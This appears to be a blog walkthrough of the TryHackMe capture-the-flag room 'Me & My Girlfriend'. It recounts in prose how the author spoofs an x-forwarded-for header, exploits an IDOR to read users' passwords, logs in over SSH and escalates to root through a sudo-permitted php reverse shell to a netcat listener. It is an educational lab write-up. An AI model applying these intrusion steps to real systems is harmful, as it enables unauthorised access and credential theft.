CTF Walkthrough | TryHackMe | Me & My Girlfriend

Kapish Kuchroo
5 min readFeb 16, 2023

--

Have you ever wondered how an IDOR vulnerability can lead to the root access on a remote machine through ssh. You can always LogIn on TryHackMe, go to rooms → meandmygirlfriend

Reconnaissance:

Initially using the nmap to scan the port of information gathering. I got port 80 and 22 open.

When I went ahead to port 80, I found this message which was quite different.

Adding Headers:

After doing view page source, I was able to see this message that suggested that for a header x-forwarded-for

I learnt this new concept of applying headers to open or redirect to the hidden website. This understanding took me a while since I was not able to open the website that was hidden under this header.

I captured the request using burp suite and then I sent the request to the repeater with the header added in the request.

First, I edited a single request and I tried to understand the response coming from that single request. I was able to get a redirect to the website using the header.

After doing it for one time, it prompted a new request without the header. So I either had to keep on adding the same header for each request which was a tedious job or find an automated way of adding it for every request.

I went to Proxy settings and added the request header in the match and replace rules. This automated the response for each request and added the header x-forwarded-for: localhost

Once I added this request header, I was able to access the website.

Gaining Access (IDOR):

I registered as a new user and tried to login later using the same credentials.

You can see in the url, that after the query string there is a chance for IDOR vulnerability which is based on authorization.

I kept on changing the user id paramter and found multiple users in the website. Here is found one user with user id 9.

I was able to recover the password as well.

For user id 5 I found user Alice with the passowrd 4lic3.

I got IDOR vulnerability and found 6 users with different userid. Most interesting one is Alice.

I remembered the port 22, it was open. I saw this as an opportunity to login into the network machine using the same password I found in the website.
I used the command to login through ssh.

I enumerated the alice profile and found the first flag in the my_secret directory.

Privilege Escalation:

After finding the first flag, I went on to find root user flag through sudo -l command.

There I found that the reverse shell existed for /usr/bin/php on GTFO bins.
I edited the reverse shell command to add my kali machine’s ip address with a valid port 1234 for net cat listner.

I ran the command for the Alice account through ssh and found the flag

I saw a reverse shell on the netcat listner and found the flag in /root directory.

See you guys in the next one. Peace ✌🏽

--

--

Kapish Kuchroo
Kapish Kuchroo

Written by Kapish Kuchroo

Receiving and Perceiving misconfigurations in the computing systems

No responses yet